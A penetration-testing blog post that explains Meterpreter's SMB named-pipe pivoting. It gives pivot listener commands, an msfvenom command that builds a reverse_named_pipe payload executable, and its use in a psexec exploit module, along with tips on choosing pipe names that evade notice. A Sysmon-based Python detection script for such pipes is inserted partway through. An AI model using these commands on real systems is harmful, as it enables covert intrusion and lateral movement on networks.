SMB Named Pipe Pivoting in Meterpreter

October 29, 2018
Written by: Péter Gombos

First published on Medium...

A hidden feature of Metasploit is the ability to add SMB Named Pipe listeners in a meterpreter session to pivot on an internal network. At least I think it’s hidden, as the only place I’ve found it documented is in the original pull request. While that pull request has all the details you need to get going, it is not easy to find, and you still have to read OJ’s screenshots to see what you can do. Hopefully, this post will let other people know about this awesome feature, and pop up higher when searching for Metasploit Meterpreter Pivot (rack up that SEO).

What is SMB Named Pipe and Named Pipe Pivot?

Named pipes are similar to open TCP ports, where a client can connect to a server listening on a given port. A process registers a named pipe endpoint, and connections made through SMB to this endpoint are delivered to that process.

Pivoting through SMB Named Pipes has been a feature of Cobalt Strike for years now, but landed in Meterpreter just last year. In the same way as a port forward pivot is set up, your meterpreter session registers a named pipe and listens for connections to it. After it has been configured, your meterpreter session acts as a listener for SMB connections.

The main reason for using a named pipe pivot is that the connection is SMB instead of HTTP/HTTPS. In a Windows environment there are a lot of SMB connections going around, and SMB traffic between two clients might not look suspicious. On the other hand, setting up an HTTP server on a client could raise eyebrows. You might also see networks where most ports between clients have been blocked, but port 445 and SMB are still allowed.

How do I set up a named pipe pivot listener?

In an existing meterpreter session, run pivot -h to bring up the help for pivoting. To create a listener, run pivot add -t pipe -l PIPEHOST -n PIPENAME -a <x86 or x64> -p windows. PIPEHOST is the compromised machine’s IP and PIPENAME is an identifier you choose. The examples use msf-pipe, but I would suggest using something that blends in a bit. Both x86 and x64 payloads are supported. For now, the only supported type (-t) is pipe, and the only platform (-p) is Windows.

After running that command, run pivot list to see all the pivot points that are configured. If you need to remove the listener, just type pivot remove -i <ID>, where ID is the hash shown for that entry in the list.

What actually happens here is that you set up a stager within the meterpreter session. When a new session connects back to your meterpreter pivot listener, the stage is sent by that meterpreter stager, not by a stager running on your Metasploit server. This is why you have to specify the architecture and platform when setting up the listener.
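From the defender's side, the listener described above is visible as a process registering a named pipe on the compromised host. As an added example (not part of the original post and not Metasploit code), the Python below triages Sysmon-style pipe events (Event ID 17 PipeCreated, 18 PipeConnected): it flags the default msf-pipe name from the Metasploit examples and pipes created by processes outside a trusted path allowlist. The event records, image paths and the allowlist are constructed assumptions to be tuned per environment.

```python
import json

# Constructed Sysmon-style pipe events (EventID 17 = PipeCreated, 18 = PipeConnected).
# Images and pipe names are invented sample data, not real telemetry.
SAMPLE_EVENTS = r"""
{"EventID": 17, "Image": "C:\\Windows\\System32\\svchost.exe", "PipeName": "\\srvsvc"}
{"EventID": 17, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\pipe.exe", "PipeName": "\\msf-pipe"}
{"EventID": 18, "Image": "C:\\Windows\\System32\\lsass.exe", "PipeName": "\\lsass"}
{"EventID": 17, "Image": "C:\\Users\\bob\\update.exe", "PipeName": "\\winsock-helper"}
"""

# Default pipe name used in the Metasploit pivot examples; extend with other tooling defaults.
KNOWN_DEFAULT_PIPES = {"msf-pipe"}
# Assumption: in this environment only binaries under C:\Windows\ are expected to create pipes.
TRUSTED_IMAGE_PREFIXES = ("c:\\windows\\",)


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def triage_pipe_events(events):
    """Return findings for PipeCreated events that match a default name or an untrusted creator."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 17:  # only pipe creation registers a new listener
            continue
        pipe = ev["PipeName"].lstrip("\\").lower()
        image = ev["Image"].lower()
        reasons = []
        if pipe in KNOWN_DEFAULT_PIPES:
            reasons.append("known tooling default pipe name")
        if not image.startswith(TRUSTED_IMAGE_PREFIXES):
            reasons.append("pipe created by process outside trusted paths")
        if reasons:
            findings.append({"pipe": pipe, "image": ev["Image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_pipe_events(parse_events(SAMPLE_EVENTS)):
        print(f"{f['pipe']:<16} {f['image']:<55} {'; '.join(f['reasons'])}")
```

The svchost.exe entry is not flagged because srvsvc is a normal system pipe created from a trusted path; a renamed pipe from an unusual process is still caught by the path rule.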

How do I use the pivot?

In the same way as with a regular listener. You can generate payloads with msfvenom, for instance:

msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST= PIPENAME=msf-pipe -f exe -o pipe.exe

You can also use the payload option in exploit modules, for instance in exploit/windows/smb/psexec_psh:

set payload windows/x64/meterpreter/reverse_named_pipe

Set all the other options, and fire away.

In conclusion

Named pipes are awesome, and a great addition to meterpreter. I hope you can use them for great success.

Thank you, OJ, for adding this feature, and for making me aware of it through your streams!